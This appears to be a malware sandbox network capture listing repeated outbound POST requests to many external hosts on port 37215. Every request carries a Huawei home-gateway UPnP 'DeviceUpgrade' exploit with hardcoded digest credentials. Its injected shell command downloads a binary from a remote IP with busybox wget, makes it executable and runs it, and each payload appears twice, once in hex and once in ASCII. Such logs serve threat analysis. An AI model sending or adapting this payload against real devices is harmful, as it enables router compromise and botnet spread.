                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              282192.168.2.1538486156.254.189.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206314087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              283192.168.2.1546030156.188.203.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206363916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              284192.168.2.1550184157.251.217.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206363916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              285192.168.2.1547140181.187.112.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206429958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              286192.168.2.1533386122.234.78.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206435919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              287192.168.2.155325242.65.82.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206435919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              288192.168.2.1550086156.80.50.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206435919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              289192.168.2.154568837.61.23.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206469059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              290192.168.2.1540424138.120.1.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206492901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              291192.168.2.1554942121.151.207.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206513882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
